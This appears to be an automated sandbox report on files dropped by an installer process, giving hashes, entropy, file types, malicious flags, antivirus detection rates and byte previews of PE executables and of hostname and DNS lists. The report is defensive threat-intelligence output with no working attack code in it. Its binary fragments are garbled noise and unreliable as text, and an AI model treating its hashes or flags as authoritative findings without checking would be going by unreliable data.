                                                                                                                                                                                                                                Preview:0001-cab8-4c8c-43de.reporo.net..002-slq-470.mktoresp.com..004-btr-463.mktoresp.com..005.free-counters.co.uk..006.free-counters.co.uk..0075-7112-e7eb-f9b9.reporo.net..007.free-counters.co.uk..008.free-counters.co.uk..009.bapi.adsafeprotected.com..009-yli-241.mktoresp.com..00b5-d72d-8252-a96c.reporo.net..00f9-d59a-b75d-8898.reporo.net..00v07c3k7o.kameleoon.eu..010-knz-501.mktoresp.com..011-ubx-120.mktoresp.com..012.2o7.net..014-clr-420.mktoresp.com..01e7-6f86-e035-c4b6.reporo.net..0218-8f89-7967-768b.reporo.net..023-ezk-120.mktoresp.com..024f-c409-1d64-9c88.reporo.net..026-yoz-259.mktoresp.com..0271-842d-5a8b-d2c9.reporo.net..028-mbr-250.mktoresp.com..029-bnh-970.mktoresp.com..02y7m1at09.mentalist.kameleoon.com..035-lyw-022.mktoresp.com..037-iqy-141.mktoresp.com..037-mcx-531.mktoresp.com..038-azf-323.mktoresp.com..040-sms-890.mktoresp.com..048-acr-930.mktoresp.com..048c-ec4c-aad9-392a.reporo.net..048-hld-130.mktoresp.com..049-nhe-370.mktoresp.com..049-oxj-466.mktoresp.com..04fd-74b3-b2f6
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):130921
                                                                                                                                                                                                                                Entropy (8bit):4.854964605740121
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:i0XU4NJMlLcWT4outY6fVnr6Jph2Iglhf6gjsspylSXHHxH/n0udLQqOWYbKOJ3w:5WMoutYIVxiggTlSXHBMWNOF1nP6
                                                                                                                                                                                                                                MD5:BA1435F50EB74C8A1AD64A75EB9D478B
                                                                                                                                                                                                                                SHA1:70EF49A54615637DB396DDDE8FB011BD62AF1E4C
                                                                                                                                                                                                                                SHA-256:5A718BC1916D74A426905484022551FA3EC4DA678B0B1126F1D5CF674B42054D
                                                                                                                                                                                                                                SHA-512:D73240E16152DE66C5BD20A270528AC93D66D14E7458E753254767C37C7B292197E0FD1E3C4B4B44D91BF720C038D2DF294B1AE1A5884DDA45D4955B248FE9E5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:0-channel-proxy-07-ash2.facebook.com..0-edge-chat.facebook.com..1-channel-proxy-07-ash2.facebook.com..1-edge-chat.facebook.com..11.lla2.facebook.com..2-channel-proxy-07-ash2.facebook.com..2-edge-chat.facebook.com..2fookaside.fbsbx.com..3-channel-proxy-07-ash2.facebook.com..3-edge-chat.facebook.com..4-channel-proxy-07-ash2.facebook.com..4-edge-chat.facebook.com..5-channel-proxy-07-ash2.facebook.com..5-edge-chat.facebook.com..6-channel-proxy-07-ash2.facebook.com..6-edge-chat.facebook.com..9fdmqbgdmp.apps.fbsbx.com..a.ns.facebook.com..a.ns.t.facebook.net..a.ok.facebook.com..a3.sphotos.ak.fbcdn.net..adtools.facebook.com..ae0.bb01.ams2.tfbnw.net..ae0.bb01.atl1.tfbnw.net..ae0.bb01.bos2.tfbnw.net..ae0.bb01.hkg1.tfbnw.net..ae0.bb01.hnd1.tfbnw.net..ae0.bb01.lhr2.tfbnw.net..ae0.bb01.lla1.tfbnw.net..ae0.bb01.mia1.tfbnw.net..ae0.bb01.nrt1.tfbnw.net..ae0.bb01.sin1.tfbnw.net..ae0.bb02.ams2.tfbnw.net..ae0.bb02.atl1.tfbnw.net..ae0.bb02.bos2.tfbnw.net..ae0.bb02.hkg1.tfbnw.net..ae0.bb02.lhr2.tfbnw.net..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):130921
                                                                                                                                                                                                                                Entropy (8bit):4.854964605740121
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:i0XU4NJMlLcWT4outY6fVnr6Jph2Iglhf6gjsspylSXHHxH/n0udLQqOWYbKOJ3w:5WMoutYIVxiggTlSXHBMWNOF1nP6
                                                                                                                                                                                                                                MD5:BA1435F50EB74C8A1AD64A75EB9D478B
                                                                                                                                                                                                                                SHA1:70EF49A54615637DB396DDDE8FB011BD62AF1E4C
                                                                                                                                                                                                                                SHA-256:5A718BC1916D74A426905484022551FA3EC4DA678B0B1126F1D5CF674B42054D
                                                                                                                                                                                                                                SHA-512:D73240E16152DE66C5BD20A270528AC93D66D14E7458E753254767C37C7B292197E0FD1E3C4B4B44D91BF720C038D2DF294B1AE1A5884DDA45D4955B248FE9E5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:0-channel-proxy-07-ash2.facebook.com..0-edge-chat.facebook.com..1-channel-proxy-07-ash2.facebook.com..1-edge-chat.facebook.com..11.lla2.facebook.com..2-channel-proxy-07-ash2.facebook.com..2-edge-chat.facebook.com..2fookaside.fbsbx.com..3-channel-proxy-07-ash2.facebook.com..3-edge-chat.facebook.com..4-channel-proxy-07-ash2.facebook.com..4-edge-chat.facebook.com..5-channel-proxy-07-ash2.facebook.com..5-edge-chat.facebook.com..6-channel-proxy-07-ash2.facebook.com..6-edge-chat.facebook.com..9fdmqbgdmp.apps.fbsbx.com..a.ns.facebook.com..a.ns.t.facebook.net..a.ok.facebook.com..a3.sphotos.ak.fbcdn.net..adtools.facebook.com..ae0.bb01.ams2.tfbnw.net..ae0.bb01.atl1.tfbnw.net..ae0.bb01.bos2.tfbnw.net..ae0.bb01.hkg1.tfbnw.net..ae0.bb01.hnd1.tfbnw.net..ae0.bb01.lhr2.tfbnw.net..ae0.bb01.lla1.tfbnw.net..ae0.bb01.mia1.tfbnw.net..ae0.bb01.nrt1.tfbnw.net..ae0.bb01.sin1.tfbnw.net..ae0.bb02.ams2.tfbnw.net..ae0.bb02.atl1.tfbnw.net..ae0.bb02.bos2.tfbnw.net..ae0.bb02.hkg1.tfbnw.net..ae0.bb02.lhr2.tfbnw.net..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1056575
                                                                                                                                                                                                                                Entropy (8bit):4.782467262964209
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:zm5eVEzDtB/fKGUu1GlEHh1pfRH+NYnlqxqiiiNtWl:zm5eVwtB/Shu1GaHh1hRHgYlOiii
                                                                                                                                                                                                                                MD5:C7183C7E129894D2634E14D86C2C9D94
                                                                                                                                                                                                                                SHA1:40A97A2D57DACCD4AE455958BE3F0C44AEF12521
                                                                                                                                                                                                                                SHA-256:1C288BD7A4BF7BF322F3C2949F65AF3302019E93E7F92F211955A15C666A4A8B
                                                                                                                                                                                                                                SHA-512:56A1ADD9DE07EB49DE8440F00772B211E382DC244A5CD9D5D4C7AE73CF56ABDB2E76F3CDB1D81CC8D2CD0E21616844F20C9E24C9F3B21A46307C983A455B5E8B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:0001-cab8-4c8c-43de.reporo.net..002-slq-470.mktoresp.com..004-btr-463.mktoresp.com..005.free-counters.co.uk..006.free-counters.co.uk..0075-7112-e7eb-f9b9.reporo.net..007.free-counters.co.uk..008.free-counters.co.uk..009.bapi.adsafeprotected.com..009-yli-241.mktoresp.com..00b5-d72d-8252-a96c.reporo.net..00f9-d59a-b75d-8898.reporo.net..00v07c3k7o.kameleoon.eu..010-knz-501.mktoresp.com..011-ubx-120.mktoresp.com..012.2o7.net..014-clr-420.mktoresp.com..01e7-6f86-e035-c4b6.reporo.net..0218-8f89-7967-768b.reporo.net..023-ezk-120.mktoresp.com..024f-c409-1d64-9c88.reporo.net..026-yoz-259.mktoresp.com..0271-842d-5a8b-d2c9.reporo.net..028-mbr-250.mktoresp.com..029-bnh-970.mktoresp.com..02y7m1at09.mentalist.kameleoon.com..035-lyw-022.mktoresp.com..037-iqy-141.mktoresp.com..037-mcx-531.mktoresp.com..038-azf-323.mktoresp.com..040-sms-890.mktoresp.com..048-acr-930.mktoresp.com..048c-ec4c-aad9-392a.reporo.net..048-hld-130.mktoresp.com..049-nhe-370.mktoresp.com..049-oxj-466.mktoresp.com..04fd-74b3-b2f6
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3134848
                                                                                                                                                                                                                                Entropy (8bit):6.373276623362357
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:UEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVc3338r:E92bz2Eb6pd7B6bAGx7u333s
                                                                                                                                                                                                                                MD5:64F68F0B5364A0313EF5C2EDE5FEAC47
                                                                                                                                                                                                                                SHA1:00AD3DAB6E7906BA79BA23EE43809430ED7901B4
                                                                                                                                                                                                                                SHA-256:25C367DA28A2E61834BBAEED1A594A0CA1E377A8C27215C9AD6AC5D97F671B8B
                                                                                                                                                                                                                                SHA-512:75586A619F9DC618652D62849C7DE840FAF83378ADBB78572A342807B2749628FD0BAAEA79E16124CAC5F82AA49BC9F77274AF039CD7D52885CC655235658DE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,..h......`F,......P,...@...........................0.....i.0...@......@....................-......p-.29....-............../../....................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc........-.......-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):186752
                                                                                                                                                                                                                                Entropy (8bit):6.7007777360665415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:7DocUCZcFuLNB1o+4jMPzp4gVvaxYoJJMqqDZWAEwPLyhLKs9/0M0/j4oUg:7pb1llUY4CqqDZtvPLyhLKs98vjn
                                                                                                                                                                                                                                MD5:912DD91AF5715A889CDBCAE92D7CF504
                                                                                                                                                                                                                                SHA1:521E3F78DEC4AAD475B23FA6DFDDA5CEC2515BFE
                                                                                                                                                                                                                                SHA-256:C66F31400961F68B58157B7C131F233CAEF8F5FC9175DD410ADF1D8055109659
                                                                                                                                                                                                                                SHA-512:132EADBDDCAA0B0CF397FFB7613F78F5EF3F345432A18FD798C7DEB4D6DFBF50C07D9D5C7AF3F482EE08135A61BD71F75FD4753B932E2899E9E527F2FA79FA37
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@0u.!^&.!^&.!^&.Y.&.!^&.T['.!^&.TZ'.!^&.T]'.!^&.T_'.!^&.I_'.!^&.!_&.!^&.T['.!^&.TZ'.!^&.T^'.!^&.T.&.!^&.!.&.!^&.T\'.!^&Rich.!^&................PE..d...#..a.........." .........................................................@............`.......................................................... ..(....... ......../...0.......S..T...........................PT..8............................................text............................... ..`.rdata..............................@..@.data....Q..........................@....pdata.. ...........................@..@.rsrc...(.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):659328
                                                                                                                                                                                                                                Entropy (8bit):6.363869452122072
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:QApy86cd+naTz7IR8Td7hNO6j5xqB625KGF+e/dCFnzdhdge:QApscQaTy8dpEgLe1CFzdhdge
                                                                                                                                                                                                                                MD5:A700A38B69B46C6BD84E562CB84016CD
                                                                                                                                                                                                                                SHA1:7ED3C9CF3B2B06504EAE208F91FAFDF6445876E7
                                                                                                                                                                                                                                SHA-256:6FFDB8CE8AF7C66FDD95E2F622A7BE6C35C6FA8097E3888A8821F7E12E812252
                                                                                                                                                                                                                                SHA-512:77B3D0CB076D365F623A285564D586E62D79E56587171F5413CDDF97127ABE02B1E931B7B283076AA880F662BCC262659FA7921B98D9A84EECD5AFCAE389D531
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........o.`.<.`.<.`.<..3<.`.<..]<.`.<...=.`.<...=.`.<...=.`.<...=.`.<...=.`.<...=.`.<.`.<xa.<...=.`.<...=.`.<...=.`.<.._<.`.<.`7<.`.<...=.`.<Rich.`.<................PE..d......a.........." ..........+......{........................................2...........`.........................................p....$..L.........2.@....@2.8[......./....2.l...p...T.......................(......8...............P............................text............................... ..`.rdata...).......*..................@..@.data...X.)..0...`..................@....pdata..8[...@2..\...r..............@..@.rsrc...@.....2.....................@..@.reloc..l.....2.....................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):391552
                                                                                                                                                                                                                                Entropy (8bit):6.693437684975802
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:fnKUo3rRWseDqLDApS/uCFe0Rs+M3XdtzaOmqqDTzuU7KLn/kY:febRWseDyDApcul37ndpaSqnzHKLT
                                                                                                                                                                                                                                MD5:7068D205FEF247AEC397ECA13D308721
                                                                                                                                                                                                                                SHA1:FF25A34C6F81DB10C098176A54447A29DE643526
                                                                                                                                                                                                                                SHA-256:FD8E721C32AB5091B62237A11C09D961A8A93BB11758CF67C3CA3BDA23801E87
                                                                                                                                                                                                                                SHA-512:A97113B311884DE27111CA865C346C14903585B0E9DDF5617B4E8AEF17DEA8940E06D82286A09D8B1DB93AD64C213C1927C04B1850A9874CFCBBC02223696C66
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.5.>.[.>.[.>.[.7..*.[..q..:.[.l._.6.[.l.X.=.[.l.^.'.[.l.Z.:.[...../.[.>.Z...[..._.".[...R...[...[.?.[.....?.[.>..?.[...Y.?.[.Rich>.[.................PE..d...q.`.........." .....<...p+.....h ....................................................`.........................................ps..T....s..@.......0........!......./..............p...................p...(...p................P...............................text....;.......<.................. ..`.rdata..\I...P...J...@..............@..@.data.....(.........................@....pdata...!......."..................@..@.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29278080
                                                                                                                                                                                                                                Entropy (8bit):5.89888763105275
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:xR0KDcKMMk72vv6wHMHYqUpXAzs0kPEIp9UCaMsxxK5oXsuHMBc6MC1CdsCMXCcn:QKBHMHYPZ/E29UIyk
                                                                                                                                                                                                                                MD5:8E5E999C35698D8387A733DE759F07A5
                                                                                                                                                                                                                                SHA1:070290F7F0A0D3D16A39F3FA0543A12D6953E3BF
                                                                                                                                                                                                                                SHA-256:3D4184EF0996C9EC04021F8BA6FF5F7C27B096D31951575E952DA63BD15491E1
                                                                                                                                                                                                                                SHA-512:675A03430816679324A02A710269FFF23B2E60F1093708A2362CBD88330BDEE141B2537F46228271E55F99A4B980D830C461CD99B2A6163EA8BC4CC1076818AB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......... .wss.wss.wss...s.wss..wr.wss..pr.wss..vr.wss..rr.wss.s.wss|.rr.wss.s.wss...s.wss.wrslvss.s.wss].wr.wss].vr.wssd.vr.wssd.zr.wssd.sr.wssd..s.wss.w.s.wssd.qr.wssRich.wss........................PE..d....q._.........." ...............h...................................................`.........................................`...t.......T......(........?......./.....4....%..p...................0'..(...0&..................p............................text............................... ..`.rdata...\.......^..................@..@.data....G...@..."...2..............@....pdata...?.......@...T..............@..@.nv_fatb..........................@....nvFatBi.............|..............@....rsrc...(...........~..............@..@.reloc..4..........................@..B........................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1012608
                                                                                                                                                                                                                                Entropy (8bit):6.449078160348241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:9gVfxCIGEvc9iDM/n+h7YKMEw+WobpLe2DF+0axh:wfkIVc98O+HDdlch
                                                                                                                                                                                                                                MD5:F252EC984A4101C1D6E54C66467A4513
                                                                                                                                                                                                                                SHA1:EAC5ED1F80FEAB9173939C35CF6336D5E2D5CF23
                                                                                                                                                                                                                                SHA-256:843F614089A543857DC5B19E866983DB322C26857D1AEE49A3E0B56B2827E6C1
                                                                                                                                                                                                                                SHA-512:B4467AC983AB1711EC0D2D598CDDFFAA821B52E956142B240A9D0DC94274DB007C28067D08E66035397D4536AE81FC5F25779846FCD043153B1D53AB91A14325
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................J/b.....D....E.J....z......!.....pn.......C.....E......y......~......{....Rich...................PE..d...".._.........." .....0....0.....x'.......................................@<.....T.....`..........................................3..M$..PW..x.....<......`;......D.../... <.,...................................0j..p............@...............................text..../.......0.................. ..`.rdata...$...@...&...4..............@..@.data.....,..p...,...Z..............@....pdata.......`;.....................@..@.rsrc.........<......*..............@..@.reloc..,.... <.....................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1888640
                                                                                                                                                                                                                                Entropy (8bit):6.585621011884774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:iTMAY7B/seDVOiqc4l5VklP5N4yS4dy7jILi:iAseDVOxyqfILi
                                                                                                                                                                                                                                MD5:734C92BDC03130A5F5D4EB71C90FFB39
                                                                                                                                                                                                                                SHA1:D35BEB14BE5E57AE2902A294E49B4ED230414FEE
                                                                                                                                                                                                                                SHA-256:A81E2D4E57AD017BBB5EB1EDE09949F18F2A062F2AC6C95711653A8E654DFF30
                                                                                                                                                                                                                                SHA-512:3B30A129BAA1B3A393B1ED44988E66E568A78116A9CB9962DDEB2889C595FE872E64C5CFB6071060EEF76EF17C161F5E4997ACE0E2224192AC94C841AC23182E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......U..T..............-.....6up.....6uq..............y.....C......C......C......C.......Lu........._...................A.......)............Rich............................PE..d...Y.`.........." .....T................................................................`......................................... ...x............p..0.......(&......./...........g..p....................h..(....g...............p...............................text...aR.......T.................. ..`.rdata..6....p.......X..............@..@.data...8...........................@....pdata..(&.......(..................@..@.nv_fatb8...........................@....nvFatBi0....`......................@....rsrc...0....p......................@..@.reloc..............................@..B................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4443520
                                                                                                                                                                                                                                Entropy (8bit):5.657003585018005
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:jTOSa9v4YPz6C4B6D83iGxZJgfABQm8202Sbr:Q473Gz
                                                                                                                                                                                                                                MD5:A29A132D82E6905FADDB6A1A29B85E5B
                                                                                                                                                                                                                                SHA1:F16F932705857739471E75FF836F9D5B5954B33E
                                                                                                                                                                                                                                SHA-256:02ABD4AAF3653DCE2C9486241812E31E1CDA1AE7A13FDD211402B3951C63B293
                                                                                                                                                                                                                                SHA-512:29B5B21CC6B202FB5D535B6C77D77BDFB8A633E72F35EA717C298B02BA19211CE2BB14CEE5974DB3270594FB6CDB7E21528D9F4247D25C5538C12CF97867B43D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,Y.uB..uB..uB......uB..uC..uB......uB......uB......uB....uB....uB....uB.Rich.uB.........................PE..d......[.........." .....p...LC...............................................C......cD...`..........................................~C.p....wC.(.............C.t.....C../....C.....................................@pC.p............................................text....o.......p.................. ..`.rdata....B.......C..t..............@..@.data....5....C......tC.............@....pdata..t.....C.......C.............@..@.reloc........C.......C.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):600960
                                                                                                                                                                                                                                Entropy (8bit):6.461456013444461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:ytyzehW71L8JAEfrirOA4xeCluTdtg8aLSXa:yozem1oJAEfrirOA4xeCluTdtg8aLga
                                                                                                                                                                                                                                MD5:47B9EBF37BF5C7EF7A0EF51D270BE99D
                                                                                                                                                                                                                                SHA1:9FBE71D06939657D0D955E1CFE1DEE64971CAFB1
                                                                                                                                                                                                                                SHA-256:1C51B708D501CBD2CEA9D79D1AE7BD5253FCC02E482F80AC9169939022C5F5E3
                                                                                                                                                                                                                                SHA-512:54A9B4B351220E6987870361F48D15825E3ADB15D4E465DA60A8D5ED8327E2FCF1D6BEB45B6B257164B8DBAD772A42522233C8FFB670D2546DEDD325244A2F30
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w..3...3...3...:.r.'...a...,...a...9...a...7...a...5......6...V...>...3...3......2............2......2...Rich3...........................PE..d.....Mb.........."......(.....................@.............................P......t.....`.................................................4e.......0...........U......./...@.......~..........................(.......8............@...............................text....'.......(.................. ..`.rdata..BH...@...J...,..............@..@.data....(......."...v..............@....pdata...U.......V..................@..@CPADinfo8.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98176
                                                                                                                                                                                                                                Entropy (8bit):6.191766865001076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:ZbQZwEgZDf4mkpxHAnFce6KBE1BLt35pEXOy36Q7a1:ZbQZwENKE1BCXOG6Qe1
                                                                                                                                                                                                                                MD5:9174CCE86288E15D5ADD9E199FEC063B
                                                                                                                                                                                                                                SHA1:3BDEE46513E084529220904040AF11BB0B1F82C8
                                                                                                                                                                                                                                SHA-256:52B31A0B3B8CFACDFBE0B408A722F77D1D553D5BC81383D118CA592FF8732A4E
                                                                                                                                                                                                                                SHA-512:7E08336390AE6CB32A4D58242B9538A2D6086E4D949C29E87EB9931B4CBB306A7AE6E819A79EA53C4206DE89928373136F9E60DA27B9513C0B41C76870FBF034
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........].A.3.A.3.A.3.H...Q.3..Z..E.3...7.I.3...0.E.3...6.].3...2.G.3...2.T.3.A.2.6.3..:.f.3..3.@.3....@.3.A...@.3..1.@.3.RichA.3.........PE..d...C.#`.........." .........0).....<........................................0*.....|Y....`......................................... ...\...|.........*.8.....*......P.../... *.l.......p.......................(... ...8...............P............................text.............................. ..`.rdata...e.......f..................@..@.data....(..@.......$..............@....pdata........*......8..............@..@.rsrc...8.....*......F..............@..@.reloc..l.... *......L..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):73
                                                                                                                                                                                                                                Entropy (8bit):3.1377695485602666
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:66YvWCc1KSUtvnnSjjhgLSTLUU:61WCcJUdnShOSTLv
                                                                                                                                                                                                                                MD5:D9229B2BF6EA93565EBBEB81459025C1
                                                                                                                                                                                                                                SHA1:5B8AF056D1A853B73AC94903EDD1D6F167AF8D22
                                                                                                                                                                                                                                SHA-256:F975168980DC06D1F64400C045F73E13E4E68AB8F350AA23304924461CCE1CB6
                                                                                                                                                                                                                                SHA-512:AB8650D51B0606738001E70ACB28F18A7B3A89445BA64F1264908E6D9CC6A94FA93D7B35377E817A5DB98E8050C8C9942782DDCCCEB0C9795F3E05B5E9D4304C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:9.9.9.9..8.8.8.8..8.8.4.4..9.9.9.9..1.1.1.1..208.67.222.222...76.76.19.19
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):15655808
                                                                                                                                                                                                                                Entropy (8bit):6.686367384579656
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:uQxPPanEiawYfXOhiLF9T+v4lX2KufhD0bJBFR8DTDm:uCPCnEiawYPOYj+v4lX2KufhD0bzUXm
                                                                                                                                                                                                                                MD5:62F0BE8BB4858B91ECACF82F72F2B3B0
                                                                                                                                                                                                                                SHA1:EBDFEB40AC0565CE6D2FA893557FFCDEF76EE5FC
                                                                                                                                                                                                                                SHA-256:5F1783D8E15EB76ED15C27C946102CDBAF1CE2650F6A1CCCEC3F86D00B65DC5D
                                                                                                                                                                                                                                SHA-512:AE1335B1E596600359AAB2F248A3B1816D43595D745A77BAAF75B7AF9B6AAA835F3ED45574DDBD729F9B12033F2EBACBF891947CC96246770D6816A528EC4688
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................nSr...-.~.....X..............0.c.....c.....c.....K.....K.....K.....K.J...K.....Rich..........PE..d......[.........." .........W.....L.7.............................................@.....`..........................................n..x...Xp..d......................../... ..................................(......................8............................text............................. ..`.rdata....>......>.................@..@.data...$............p..............@....pdata..............................@..@.tls................................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
